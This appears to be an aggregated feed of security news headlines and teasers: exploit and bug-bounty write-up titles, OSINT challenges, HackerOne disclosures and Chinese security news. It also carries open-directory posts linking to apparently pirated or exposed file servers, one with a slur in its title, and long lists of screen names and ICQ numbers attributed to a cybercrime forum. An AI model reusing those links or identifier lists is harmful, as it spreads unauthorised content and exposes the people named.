    RCE and Auth Bypass in Aqua Illumination Hydra Series Aquarium Lights
    submitted by /u/laransec [link] [comments]
    Reverse Engineering 3201: Symbolic Analysis
    submitted by /u/OpenSecurityTraining [link] [comments]
    A story of leaking uninitialized memory from Fastly
    submitted by /u/albinowax [link] [comments]  ( 1 min )
    TrendNET AC2600 RCE from the Internet
    submitted by /u/dinobyt3s [link] [comments]
  • Open

    Top Ways Websites get Hacked by Spammers
    There’s a lot that goes into a website environment in terms of functionality. Due to this, it’s only natural for one of the most commonly asked questions being how websites are usually hacked. In my previous post I talk about the Most Interesting Vulnerabilities of 2021, which should provide more insight into the more recent hacks seen, or caught beforehand. In this article we’ll be discussing the primary ways websites are infected, and how you can better prevent it from happening.  Continue reading Top Ways Websites get Hacked by Spammers at Sucuri Blog.
  • Open

    Lots of movies, TV shows, and top shelf porn
    192.64.86.228 submitted by /u/inoculatemedia [link] [comments]
    Movies, Documentaries, music, TV Series etc
    Quite a handful of TV Shows, Movies, Documentaries etc. Some content may be NSFW. ​ http://188.165.227.112/portail/ submitted by /u/amritajaatak [link] [comments]  ( 1 min )
  • Open

    Cyber Investigator OSINT CTF “Crime Scene Investigation” Writeup
    The Cyber Society at Cardiff University runs the Cyber Investigator CTF, a free CTF with OSINT, forensics, and investigation challenges. Continue reading on Medium »  ( 5 min )
    Walkthrough — Hacktoria: Geolocation 02
    After having so much fun solving Hacktoria’s Geolocation — 01 challenge yesterday, I have decided today to go for the 2nd challenge. Here… Continue reading on Medium »  ( 5 min )
    Quiztime — Random OSINT Challenge 7
    On Jan 12, 2022, Quiztime (contributor @twone2) shared a new OSINT quiz with us. The objective was simple. We had to figure out where and… Continue reading on Medium »  ( 1 min )
    What is OSINT?(Part 1): A practical introduction!
    This article was written in collaboration with the marvelous Aardwarewolf Continue reading on Medium »  ( 17 min )
    What is OSINT? (Part 1)
    A practical introduction Continue reading on Medium »  ( 16 min )
    Investigating Russian Number Plates
    Russian number plates come in a variety of shapes and sizes and can reveal interesting information regarding the owner of a target vehicle… Continue reading on Medium »  ( 3 min )
  • Open

    Multiple firewall layers - are they necessary?
    I was sitting around today pulling my hair out at the prospect of automating rulebases, objects, etc across the separate vendors we use for our edge and internal firewall. Then the question hit me - why do we even have an internal firewall? Our edge FW is a Palo capable of everything the internal FW does and then some. So why can't I simply take everything hanging off the internal FW, move it to the edge FW, and save some money while making my life much easier? The only things I can come up with that we lose are vendor diversity and physical separation. Am I crazy or missing something? If not - would I even gain anything out of VIRTUALLY splitting those firewalls via different vsys on the Palos (I imagine not)? Thanks! submitted by /u/difflx2112 [link] [comments]  ( 4 min )
    Modbus Traversal?
    My company has an air\gas utility monitor that's connected over cellular back to the utility provider for monitoring and reporting. Currently isolated from anything else. Our Facilities team want to put a modbus TCP device on it for our own internal monitoring and reporting. Anyone have experience with this sort of setup? If someone were to gain access to the utility monitor over cellular could they then utilize modbus to control and traverse our network through the modbus\TCP gateway? submitted by /u/ThePaulHarrell [link] [comments]  ( 2 min )
    Any special tips for a soon to be CISO?
    Hello, I'm about to become the CISO for a school I'm pretty confident on what I should do and what should be my first steps but I would like to know if any of you have any uncommon tips? Any good podcast/news source for example ? ​ Thanks ! submitted by /u/elminstor [link] [comments]  ( 4 min )
    Computer and phone security
    1) Thank you all for your suggestions on my former question. Id like to ask about some ways to secure an Android phone and a Windows computer. I am specifically looking for software and/or prefered settings to block intrusions from physical and wireless access in 2 scenarios 1) Someone gets the phone/computer physically and 2) Someone accesses it wirelessly. Id like to know what to do so the data are unreadable (Preferably encrypted) in scenario 1 while still keeping the phone/computer capable of basic functioning and so the phone/computer is harder to get into for attackers in (or before) scenario 2. Lets assume both devices are up-to-date with antivirus and firewall (When applicable). Id like to know the best method even if it means going around some hidden functions of the devices submitted by /u/O-0111 [link] [comments]  ( 1 min )
    Descriptive logic in Mobile Security
    Hi everyone! I'm a cybersecurity student and want to ask a slightly "stupid" question. In my program, there is a subject "Mobile security" where I was given the task to read a descriptive logic book of 500+ pages. So I wanted to ask, what does descriptive logic have to do with Mobile Security? Do you need to know and study this science to ensure the security of an application? submitted by /u/_hanabi_n [link] [comments]  ( 1 min )
    [MFA] Could a managed laptop count as a possession factor?
    Hi, I am supposed to secure a remote connection of company laptops with two factors. The devices are managed by Intune with conditional access. You need a company managed device to connect to the company network. Do you think that per definition the managed device with conditional access could count as a possession factor in a multi-factor authentication? Wikipedia says about the possession factor Possession factors ("something only the user has") have been used for authentication for centuries, in the form of a key to a lock. The basic principle is that the key embodies a secret that is shared between the lock and the key, and the same principle underlies possession factor authentication in computer systems. A security token is an example of a possession factor. One could argue that the device itself could count as a possession. It's not personalized but you still require one device out of a few hundred and one set of credentials to establish a connection. submitted by /u/Vertripper [link] [comments]  ( 4 min )
    Discovered IDOR vuln that reveal vaccination records
    Hello NetSec, Upon receiving my vaccination record, I discovered that I was able retrieve other vaccination records along with other patient data by simply incrementing url values. Worst part is that you can retrieve these records without being authenticated. The application initially authenticate patients to retrieve the records but, I found out you can reach the URL without being authenticated. Looking for suggestions to responsibly disclose this issue to the laboratory. I'm sure this is a violation of hipaa. submitted by /u/nocmd [link] [comments]  ( 2 min )
    Career advice request
    I’m currently a web application developer going on 10 years now. I also have 7 years in systems and network administration. I’ve always wanted to get into cybersecurity, but with so many roles out there, most asking for several years in security, I’m not sure what I’m actually qualified for. Over the years my networking knowledge and muscle memory have depleted, and perhaps feeling a bit imposter syndromey. The last server OS I supported was Windows Server 2003 so you could say I’m not up to speed on latest tech in the greater IT sphere. Also, I’m in my early 40s if that matters at all. Just looking for some general advice as to what, if anything, I should target my job search around. I’m definitely up to refresh/update my current skills with courses or whatever providing it makes sense to even pursue at this stage in my career. Thanks I’m advance. submitted by /u/zushazero [link] [comments]  ( 1 min )
  • Open

    How I approached Dependency Confusion!
    Hi People, In this blog, I will be sharing my approach for finding Dependency Confusion bugs. Continue reading on Medium »  ( 1 min )
    XSS Discovery and Exploitation With BurpSuite
    I’ve recently completed TryHackMe’s cross-site-scripting room and PortSwigger’s XSS labs and here’s what I’ve learned! This piece assumes… Continue reading on Medium »  ( 4 min )
    rDEX Bug Bounty
    Overview Continue reading on Medium »  ( 3 min )
    Vulnerability Capstone — Tryhackme
    Vulnerability Researching Continue reading on Medium »  ( 1 min )
    How I was able to buy a product for free — $$$
    Hi everyone, I hope you are good. It’s been a long time I haven’t write again. So in this article I will share about my finding.. Continue reading on Medium »  ( 1 min )
    How I Found A Simple Stored XSS
    This is the story of how I found my first Stored XSS (“Cross Site Scripting”) vulnerability in a bug bounty program and a walk through on… Continue reading on Medium »  ( 3 min )
  • Open

    SecWiki News 2022-01-31 Review
    SecWiki周刊(第413期) by ourren 配置错误注入测试中的挑战与机遇 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-01-31 Review
    SecWiki周刊(第413期) by ourren 配置错误注入测试中的挑战与机遇 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Vulnerability in PostBus public transport platform exposed customer data
    Article URL: https://portswigger.net/daily-swig/vulnerability-in-postbus-public-transport-platform-exposed-customer-data Comments URL: https://news.ycombinator.com/item?id=30147933 Points: 1 # Comments: 0  ( 3 min )
    Inspector-gadget: exploit for a vulnerability in the Linux USB Gadget
    Article URL: https://github.com/szymonh/inspector-gadget Comments URL: https://news.ycombinator.com/item?id=30146403 Points: 2 # Comments: 0  ( 5 min )
  • Open

    Puzzling RDP Cache - Putting the Pieces Together
    Good morning, It’s time for a new 13Cubed episode! Let's take a look at an easier way to reassemble RDP bitmap cache. And, if you're a little rusty on where to find the cache and how to export it, we'll cover that too! Episode: https://www.youtube.com/watch?v=9P845AMjJF0 Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed [link] [comments]  ( 1 min )
    Failed GNFA looking for tips and any advise for better learning in a better way
    Just failed my GNFA and i feel really bad; Anyone can help me out for any mental boost up by advising how i could be better in next go. submitted by /u/xray_icon [link] [comments]  ( 3 min )
  • Open

    First Time Hacking The Cloud
    What’s going on hacker folks, this is shellbreak back again with another blog post, but this time, it will be about how I found my first… Continue reading on Medium »  ( 2 min )
  • Open

    First Time Hacking The Cloud
    What’s going on hacker folks, this is shellbreak back again with another blog post, but this time, it will be about how I found my first… Continue reading on Medium »  ( 2 min )
  • Open

    สาวแซ่บแบ่งรายได้จากคลิปเสียวใน OnlyFans ช่วยทหารผ่านศึก พร้อมเผยฝันอันยิ่งใหญ่
    เดลี่สตาร์ รายงานเรื่องราวของ คามี่ สเตรลล่า สาวแซ่บดาวเด่นบนแพลตฟอร์มสำหรับผู้ใหญ่อย่าง OnlyFans ที่เปิดเผยถึงความฝันในอนาคต… Continue reading on Medium »

  • Open

    Archive of software for the Tandy Radio Shack - TRS-80 Model III
    http://cpmarchives.classiccmp.org/trs80/Software/Model%20III/ circa 1979 submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
    PDFs on Food science
    PDFs on Food safety, handling, manufacturing, storage, processing etc... ​ http://154.68.126.6/library/Food%20Science%20books/ submitted by /u/amritajaatak [link] [comments]
    Some Engineering Company website Back end
    Appears to be the back end FTP server of an engineering company website. no clue if its any useful or not. Maybe it is? ​ https://elsmar.com/pdf_files/ submitted by /u/amritajaatak [link] [comments]  ( 1 min )
    Some ODs doesn't show up in Reddit search but when trying to post, it says that it have been posted by someone?
    Lets take this NSFW OD for example: https://pmagazine.co/wp-content/uploads/ One result show up if I search for the domain. I decided to try to post it anyway since the URL he posted doesn't work anymore. When I tried to post there's a message about a duplicate post from a totally different user with the same URL. Why didn't that one show up when searching for "pmagazine"? There should be at least 2 results but only 1 is showing. submitted by /u/Boobalizer [link] [comments]  ( 1 min )
    Tranny hardcore videos (NSFW. Not my thing but who am I to judge)
    submitted by /u/Boobalizer [link] [comments]
  • Open

    Building Custom Empire Modules
    submitted by /u/DLLCoolJ [link] [comments]
  • Open

    How do you get open-source releases of vulnerabilities and other cyber threat news?
    It seems like Twitter is the answer, but I'm curious if I'm missing some sort of centralized hub for this kind of information that is free of unimportant information. What do you personally use? submitted by /u/Hymnosi [link] [comments]  ( 1 min )
    Can you "DDOS" someone through their public IP without being connected to each other in any way?
    A friend came up to me and told me that someone was "DDOSing" him. He said he got his computer IP from a video game server and he "DDOsed" him. How could he tell? He said he noticed packet loss and he had a higher ping and it disconnected him from Discord or something, they were in a call the whole time when it happened. My friend changed his PC public IP with some Windows settings after that. Now my friend believes that this guy is some big brain hacker and I can't convince him he is not, I don't want him to believe that this guy is in control of his security. Would also love to know what exactly happened and what this script kiddie could've. submitted by /u/AnnoyingN-wah [link] [comments]  ( 2 min )
    Whats the best way to secure 1) An Android phone 2) A Windows PC and 3) Home and company network?
    Hello! Id like to know how to secure an Android phone (even if it means gaining root access) while keeping basic usability 2) How to secure a Windows computer against outside attacks (also while keeping basic functionality) 3) How to secure a home and company network against attacks and data leaks submitted by /u/O-0111 [link] [comments]  ( 2 min )
    [Serious] How Fast would Quantum Computers Crack Passwords/Tokens/Logins?
    From this video I watched from my Youtube feed, I'm aware of that quantum computers would be extremely fast in computing speed, but how fast would they be able to crack things that are say: Passwords 20, 50, 100 random-characters long with just ASCII input Passwords 20, 50, 100 random-characters long that utilize ASCII, Unicode, and non-standard characters The two same concepts above, but with random words like "water", "trampoline", etc. dropped randomly into the passphrases so it's just not jumbled, and requires a full dictionary of words to crack. Randomized session-login tokens, like used for Discord, Google, browser cookies in general. Weak, typical username + password combinations used for things like social media where both are shorter than 10 characters generally. Edit: T…  ( 5 min )
  • Open

    Intro to Embedded RE Part 3: UART Discovery and Firmware Extraction via UBoot
    submitted by /u/wrongbaud [link] [comments]  ( 1 min )
    CVE-2022-0329 and the problems with automated vulnerability management
    submitted by /u/Most-Loss5834 [link] [comments]  ( 3 min )
  • Open

    How to find locations to check for Russian military build-up?
    Methods for Investigating where Russian troops accumulated along Ukraine border Continue reading on Medium »  ( 4 min )
    Walkthrough —Hacktoria: Geolocation 01
    I came across the Hacktoria website today whilst looking for OSINT information. If you navigate to “Practice” — “Geolocation” you’ll come… Continue reading on Medium »  ( 3 min )
    Why we must nurture positive ethics in “citizen-driven” OSINT
    As citizen-driven open source intelligence (OSINT) grows in popularity, so does the risk of techniques being used by bad actors. I outline… Continue reading on Medium »
  • Open

    Spare GCFA Practice
    Hey all Anyone here have a spare GCFA practice they could wing this way ? Despite multiple content run throughs and a comprehensive index, I flunked both my practice exams :S Second fail was surprising as I felt confident ! 2 weeks left now until the real thing so hoping some more turbo study and another practice may boost the confidence. Cheers ! submitted by /u/Gumps903 [link] [comments]  ( 1 min )
    Do the SANS Live Classes just reuse the slides from the book or do they have other slides to use during class time?
    Thanks! submitted by /u/curiousgal1996 [link] [comments]  ( 1 min )
    Recover Historical Firewall Logs
    Hi all, This relates to a computer running Windows 10 home. Several months ago a program made a request to make an outbound connection. This request was probably blocked by the default firewall. I would like to note any info about this request, particularly the date and time, but firewall logging was off. Is there somewhere else this would be stored? Thank you, and I'm sorry if this is the wrong forum for this. submitted by /u/KoosOomakey [link] [comments]  ( 1 min )
  • Open

    My Bug Bounty Adventure -2-
    Greetings everyone from the Promentorium bosporium. Continue reading on Medium »  ( 2 min )
    DARPA’s quest for the (almost) unhackable
    Welcome to Changelog by README! I’m your host, Blake Sobczak. Every Sunday, I’ll deliver cybersecurity news and analysis to your inbox… Continue reading on README_ »  ( 4 min )
    How I hacked my way to the top of DARPA’s hardware bug bounty
    Go inside one of the most technically challenging bug bounties ever with the researcher who subverted secure hardware designed by MIT and… Continue reading on README_ »  ( 9 min )
    How i exposed the teacher’s Aadhaar card,bank details in the college website.
    Hey fellow hackers and Bug hunters, Continue reading on InfoSec Write-ups »  ( 1 min )
    All About CSRF Flaw
    Continue reading on InfoSec Write-ups »  ( 2 min )
    Docker: From a beginner's perspective
    Docker is actually a docker engine that is used to create containers. Containers can be considered as VMs, but these VMs don’t have any… Continue reading on Medium »  ( 6 min )
    Price Tampering | Buying T-Shirts at 2 INR
    Hello Weirdos!!! Today I am going to share a write-up on a weird price tampering vulnerability I found a few months ago(currently patched). Continue reading on Medium »  ( 2 min )
    PORTSWIGGER WEB SECURITY - OS COMMAND INJECTION LAB ÇÖZÜMLERİ
    OS Command Injection, bir web uygulama sunucusunda, saldırganın rastgele işletim sistemi (OS) komutları çalıştırmasına ve uygulama… Continue reading on Medium »  ( 4 min )
    How to get started hacking django applications
    Django is a python based web framework. In this writeup, i will teach you how to analyze django based applications . For this writeup, i… Continue reading on Medium »  ( 4 min )
  • Open

    Critical full compromise of jarvis-new.urbanclap.com via weak session signing
    Urban Company disclosed a bug submitted by ian: https://hackerone.com/reports/1380121 - Bounty: $1500
    No character limit in password field
    UPchieve disclosed a bug submitted by tomyway: https://hackerone.com/reports/1462175
  • Open

    Linux Privilege Escalation: Polkit (CVE 2021-3560)
    Introduction According to Red Hat, “Polkit stands for PolicyKit which is a framework that provides an authorization API used by privileged programs.” Pkexec is a The post Linux Privilege Escalation: Polkit (CVE 2021-3560) appeared first on Hacking Articles.  ( 7 min )
  • Open

    Linux Privilege Escalation: Polkit (CVE 2021-3560)
    Introduction According to Red Hat, “Polkit stands for PolicyKit which is a framework that provides an authorization API used by privileged programs.” Pkexec is a The post Linux Privilege Escalation: Polkit (CVE 2021-3560) appeared first on Hacking Articles.  ( 7 min )
  • Open

    SecWiki News 2022-01-30 Review
    威胁想定分析框架 by ourren wJa (D&S&I)AST 工具 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-01-30 Review
    威胁想定分析框架 by ourren wJa (D&S&I)AST 工具 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    EISS-2021:从大型互联网企业零信任实践之路谈如何构建立体化的防御体系
    注:本议题公开发布于EISS-2021。
    INSEC-2020:大型企业基础架构安全
    注:本议题公开发布于INSEC-2020。
    CTIC-2020:云上攻防的实践与思考
    注:本议题公开发布于CTIC-2020。
    BCS-2020:以攻促防之攻击者视角下的防御建设
    注:本议题公开发布于BCS-2020。
  • Open

    网信办公布网络关键设备和网络安全专用产品安全认证和检测结果
    1月29日,中央网信办官网发布了2022年1号公告《关于统一发布网络关键设备和网络安全专用产品安全认证和安全检测结果的公告》。

  • Open

    JAVA ON EARTH [KNIGHT-CTF]
    Given Data: Continue reading on Medium »  ( 2 min )
    The Time Machine — Weaponizing WaybackUrls for Recon, BugBounties , OSINT, Sensitive Endpoints and…
    You must have heard about time travel in movies, series and comics. Well here we are Nah i’m not joking you can travel back in time and… Continue reading on Medium »  ( 3 min )
    xeuldoc: Fetch information about any public Google document
    Introduction Continue reading on Medium »  ( 1 min )
    קורס אוסינט בסיסי
    קורס OSINT בסיסי — חיפושים ברשת למתחילים — סילבוס Continue reading on Medium »  ( 1 min )
    Finding the author of an illustration
    A while ago I spotted an image on reddit that really struck with me. I immediately knew I wanted to use it as my profile picture… Continue reading on Medium »  ( 2 min )
    In the beginning there was a tweet
    For the past year and a half I have been very interested in a career change into the cyber security and ethical hacking industry. I have… Continue reading on Medium »  ( 1 min )
    Quiztime — Random OSINT Challenge 6
    On Jan 13, 2022, Quiztime (contributor @N_Waters89) shared a new OSINT quiz with us. The objective simple. We had to figure out where and w Continue reading on Medium »  ( 2 min )
  • Open

    Windows vulnerability with new public exploits lets you become admin
    Article URL: https://www.bleepingcomputer.com/news/microsoft/windows-vulnerability-with-new-public-exploits-lets-you-become-admin/ Comments URL: https://news.ycombinator.com/item?id=30130902 Points: 7 # Comments: 0  ( 4 min )
    CVE-2022-0329 and the problems with automated vulnerability management
    Article URL: https://tomforb.es/cve-2022-0329-and-the-problems-with-automated-vulnerability-management/ Comments URL: https://news.ycombinator.com/item?id=30128872 Points: 9 # Comments: 4  ( 2 min )
    NMAP Vulnerability Scanning Scripts
    Article URL: https://github.com/nccgroup/nmap-nse-vulnerability-scripts Comments URL: https://news.ycombinator.com/item?id=30122224 Points: 2 # Comments: 0  ( 1 min )
  • Open

    GitHub: The Red-Teamer’s Cheat-Sheet
    It’s no secret that GitHub has become one of the main information resources for red-team reconnaissance. I mean, why bother with complex… Continue reading on Medium »  ( 3 min )
    How To Handle Security Due Diligence During The M&A Process
    More often than not, we see our clients show interest in other companies. This pull can come in many different forms, but it’s usually… Continue reading on Medium »  ( 2 min )
  • Open

    How I Made +$16,500 Hacking CDN Caching Servers — Part 3
    @bxmbn Continue reading on Medium »  ( 1 min )
    How I Made +$16,500 Hacking CDN Caching Servers — Part 2
    @bxmbn Continue reading on Medium »  ( 1 min )
    How I Made $15,000+ By Hacking Caching Servers — Part 1
    @bxmbn Continue reading on Medium »  ( 1 min )
    The Time Machine — Weaponizing WaybackUrls for Recon, BugBounties , OSINT, Sensitive Endpoints and…
    You must have heard about time travel in movies, series and comics. Well here we are Nah i’m not joking you can travel back in time and… Continue reading on Medium »  ( 3 min )
    A Summary of OAuth 2.0 Attack Methods
    The attacker grabs the authentication request to construct a malicious URL and deceives the logged-in user of the server to click it. Continue reading on Medium »  ( 2 min )
    TrustRecruit — BUG BOUNTY
    TrustRecruit will be allocating 750,000 TRT of the total supply of $TRT tokens to successful bounty hunters. Continue reading on Medium »  ( 2 min )
    2fa Bypass by changing Request method to DELETE
    Hello Everyone My name is Arth Bajpai, I’m from Lucknow, India, and I’m back with my third write-up about a 2fa Bypass which I Found a… Continue reading on Medium »  ( 3 min )
    My First Bug is P1 in Just 3 Minute
    Hello Hacker’s and Security Guys that is My first article on how to find a P1 bug Continue reading on Medium »  ( 1 min )
  • Open

    CVE-2022-0329 and the problems with automated vulnerability management
    Article URL: https://tomforb.es/cve-2022-0329-and-the-problems-with-automated-vulnerability-management/ Comments URL: https://news.ycombinator.com/item?id=30128872 Points: 9 # Comments: 4  ( 2 min )
  • Open

    Some lingerie photos NSFW (among other more boring stuff)
    submitted by /u/Boobalizer [link] [comments]
    PS3 sound files from games - Nicely sorted (Good speed. ~11 MB/s.)
    submitted by /u/Boobalizer [link] [comments]  ( 1 min )
  • Open

    Misconfiguration in build environment allows DLL preloading attack
    Monero disclosed a bug submitted by nim4: https://hackerone.com/reports/896338
    XSS via X-Forwarded-Host header
    Omise disclosed a bug submitted by oblivionlight: https://hackerone.com/reports/1392935 - Bounty: $200
  • Open

    how did my Hosting service changed my interface config?
    Hello AskNetsec, I got a VPS on a hosting service with ubuntu on it and I closed all the ports changed the default ssh port and changed the root and default user passwords, then I asked my hosting service o change my public IP address, After that I saw my /etc/network/interfaces config changed...how did they do that? even there is nothing in the history :\ any info on how they did it is apricated. ​ thanks! submitted by /u/g0g0gaga [link] [comments]  ( 1 min )
    How are you guys using IOCs in your SIEM environment?
    Hey everyone! I was curious how everyone is using IOCs in their SIEM environments. We are currently focusing on TTP’s but would love to have the ability to compare our logs against known positive IOCs. We are currently only using them in our EDR solution but not our SIEM. How are you guys using them in the SIEM platform? submitted by /u/RedNeckHutch [link] [comments]  ( 2 min )
    Just finished my first week of training in SOC. Anyone here familiar with MAStermind? Looking for resources to study over the weekend.
    SOC training has been so cool. The access I have is nuts. submitted by /u/ShittyF00dPorn [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-29 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-01-29 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Five Hacking Tips - Pkexec Linux Priv. Escalation
    submitted by /u/sysrisk [link] [comments]
  • Open

    FreeBuf早报 | 芬兰外交官设备感染飞马间谍软件;美国以国安为由吊销中国通讯公司牌照
    据外媒报道,美国联邦通信委员会(FCC)以“严重的国家安全担忧”为由,吊销了中国联通美洲公司的牌照。  ( 1 min )
    Packer ?对抗 ?“透明部落”正在寻求CrimsonRAT的新出路
    Transparent Tribe组织的主要目标是针对印度政府、军队或相关组织,以及巴基斯坦的激进分子和民间社会。  ( 1 min )
    社会责任 | 斗象科技2021年的“FUN心”之道
    使命担当,践行责任
    编写基于RestTemplate的—在线武器库
    通过Springboot RestTemplate玩转自动化工具开发,达到团队协作的真正功能。  ( 2 min )
    工业网络靶场漫谈(八)|国外工业网络靶场概况
    本文将将把视角移向国外,简要梳理介绍国外工业网络靶场的发展状况。  ( 1 min )

  • Open

    North Korea's Lazarus APT leverages Windows Update client, GitHub in latest campaign
    submitted by /u/dmchell [link] [comments]
  • Open

    Detecting and mitigating CVE-2021-4034: “Pwnkit” local privilege escalation
    submitted by /u/MiguelHzBz [link] [comments]  ( 1 min )
    How to Analyze RTF Template Injection Attacks
    submitted by /u/ogunal00 [link] [comments]
    Pivoting with SSH Tunnels and Plink
    submitted by /u/m_edmondson [link] [comments]
    Rip Raw - A tool to analyse the memory of compromised Linux systems.
    submitted by /u/0x636f6f6c [link] [comments]
    Stop Storing Secrets In Environment Variables!
    submitted by /u/alxjsn [link] [comments]  ( 3 min )
    ROP Chaining: Return Oriented Programming (study notes, tutorial)
    submitted by /u/Kondencuotaspienas [link] [comments]
    "Stratus Red Team": open-source adversary emulation for AWS
    submitted by /u/thorn42 [link] [comments]
    The Cookies Parasite - Bypassing MFA with cookie theft
    submitted by /u/amirshk [link] [comments]
  • Open

    CTF Walkthrough | TryHackMe | Freshly
    Can you root this Wordpress style, SQL injection vulnerable machine? This CTF is about SQL Injection and Wordpress hacking. Developers… Continue reading on Medium »  ( 4 min )
  • Open

    Fixing the Linux Kernel Vulnerability Cve-2022-0185
    Article URL: https://blog.accuknox.com/how-to-protect-from-cve-2022-0185-using-accuknox-opensource-tools/ Comments URL: https://news.ycombinator.com/item?id=30120314 Points: 1 # Comments: 0  ( 6 min )
    RHSB-2022-001 Polkit Privilege Escalation – (CVE-2021-4034)
    Article URL: https://access.redhat.com/security/vulnerabilities/RHSB-2022-001 Comments URL: https://news.ycombinator.com/item?id=30113422 Points: 1 # Comments: 0  ( 10 min )
  • Open

    Fixing the Linux Kernel Vulnerability Cve-2022-0185
    Article URL: https://blog.accuknox.com/how-to-protect-from-cve-2022-0185-using-accuknox-opensource-tools/ Comments URL: https://news.ycombinator.com/item?id=30120314 Points: 1 # Comments: 0  ( 6 min )
  • Open

    The Importance of Responsible Disclosure
    In my years as a security analyst I have worked with many clients who were in very dire straits. A website compromise is never a pleasant experience but there are a number of cases that stick out in my mind as particularly memorable: The ecommerce website owner whose business was on the brink of disaster after having to pay thousands of dollars in fines to Visa due to the presence of a credit card skimmer. Continue reading The Importance of Responsible Disclosure at Sucuri Blog.
  • Open

    A bunch of movie scripts
    submitted by /u/theg721 [link] [comments]  ( 1 min )
    words
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    horse food
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Russian and European rocket launch videos - Broadcast quality
    http://tvdownload.esa.int/ submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
    Magnetometer datasets from various space missions
    https://pds-ppi.igpp.ucla.edu/data/ he Planetary Plasma Interactions (PPI) Node of the Planetary Data System (PDS) archives and distributes digital data related to the study of the interaction between the solar wind and planetary winds with planetary magnetospheres, ionospheres and surfaces. The PPI Node is located at the Department of Earth, Planetary, and Space Sciences at the University of California, Los Angeles (UCLA). submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-28 Review
    CodeQL 提升篇 by ourren 如何入门工控漏洞挖掘 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-01-28 Review
    CodeQL 提升篇 by ourren 如何入门工控漏洞挖掘 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    DC系列靶机知识点总结
    本篇文章,主要针对DC系列9个靶机中用到的工具,命令和提权的知识点进行总结。  ( 1 min )
    vulnhub之DC-9靶机渗透详细过程
    非常详细的DC-9打靶过程。  ( 1 min )
    vulnhub之DC-8靶机渗透详细过程
    非常详细的DC-8打靶过程。  ( 1 min )
    vulnhub之DC-7靶机渗透详细过程
    非常详细的DC-7打靶过程笔记。  ( 1 min )
    FreeBuf早报 | 欧盟向WhatsApp下通牒;朝鲜关键服务疑遭DDoS攻击
    欧盟委员会宣布, WhatsApp 必须在一个月内澄清其服务条款和隐私政策最近发生的一些变化,以确保符合欧盟的消费者保护法。  ( 1 min )
    国家网信办发布《互联网信息服务深度合成管理规定(征求意见稿)》
    《意见稿》共计二十五条,明确了对生成合成类算法和利用深度学习、虚拟现实等新技术新应用制作音视频内容等的监管要求,进一步厘清、细化深度合成技术的应用场景,明确深度合成服务提供者和使用者的信息安全义务。
    2022年10款好用免费数据恢复软件分享
    2022年10款好用免费数据恢复软件分享  ( 1 min )
    CVE-2021-4034 Linux Polkit 权限提升漏洞挖掘思路解读
    一文带你了解CVE-2021-4034漏洞的挖掘全过程。  ( 1 min )
  • Open

    Paytm-Broken Link Hijacking
    Hello Everyone…. Continue reading on InfoSec Write-ups »  ( 2 min )
    TEJAS PANCHAL ONE OF THE YOUNGEST CYBER SECURITY EXPERT.
    We welcome increasingly more potent online vulnerabilities as we go into a digitized future with advanced information technology shaping… Continue reading on Medium »  ( 1 min )
    OpenLeverage Partners with Code4rena for Audit Contest to Enhance Security Measures
    Since our inception, OpenLeverage has been committed to developing a permissionless lending and margin trading protocol with aggregated… Continue reading on Medium »  ( 2 min )
  • Open

    Exposing A Portfolio of Shadow Crew Cybercrime-Friendly Forum Communities IM Screen Names - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active portfolio of IM screen names from the infamous Shadow Crew cybercrime-friendly forum community part of a currently ongoing Technical Collection campaign for the purpose of assisting everyone in their cyber attack and cyber threat actor profiling campaigns. Sample Shadow Crew cybercrime-friendly forum community IM screen names: aim:goim?screenname=youngglobeman&message=Hello+Are+you+there? aim:goim?screenname=yeezz0r&message=Hello+Are+you+there? aim:goim?screenname=xkyroutx&message=Hello+Are+you+there? aim:goim?screenname=wisie459&message=Hello+Are+you+there? aim:goim?screenname=whailen&message=Hello+Are+you+there? aim:goim?screenname=wgrumpke&message=Hello+Are+you+there? aim:goim?screenname=verbal0g&message=Hello+Are…
    Exposing A Portfolio of Shadow Crew Cybercrime-Friendly Forum Communities ICQ UINs - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active portfolio of IM screen names from the infamous Shadow Crew cybercrime-friendly forum community part of a currently ongoing Technical Collection campaign for the purpose of assisting everyone in their cyber attack and cyber threat actor profiling campaigns. Sample Shadow Crew cybercrime-friendly forum community ICQ UINs: 999008 9773639 974763 97254007 95211861 92754913 914506 89531566 8923240 86958674 802820 777726 74623265 7444304 690033 6666666 637321 62527577 598629 59838986 56714884 56327073 5556665 517196 48721062 47564547 4545 44203686 41781 3727374 362563 35 348140 33342322 332163 330332251 327539466 320455282 320100851 319326887 31485639 304060 29457002 288687540 288670074 266472842 26633491 264975608 2482045 236790331 230406 222567486 222409185 22063094 219747908 21386767 213201784 212719246 19457815 193200333 1881621 179251032 178954300 178832228 178420526 178210999 178101166 178020075 177541908 177507739 177394922 177016428 176824746 176531816 175688952 175596058 175521773 175350857 175308348 175157730 174902318 174760817 174537112 174511919 174445299 173846049 173838529 173767788 17359522 173387414 173299970 173254582 173019781 173002204 172674035 172476811 172290141 172252866 172021743 171975533 171805992 1715300002 171468368 171440228 170627352 170324565 170036758 169769760 169243371 169220281 169006693 168834059 168769080 168675160 168595955 168495889 168422846 168413916 167927175 167897380 167636937 167023436 166657595 166581197 166407706 165969755 165638624 165546617 164872312 164165878 164008345 162852265 1601617 158807983 15652907 154866004 152616 150860495 139736678 130915854 11402050 1111111 10966997 107021 105233239 103363810 100631 100161 Stay tuned!
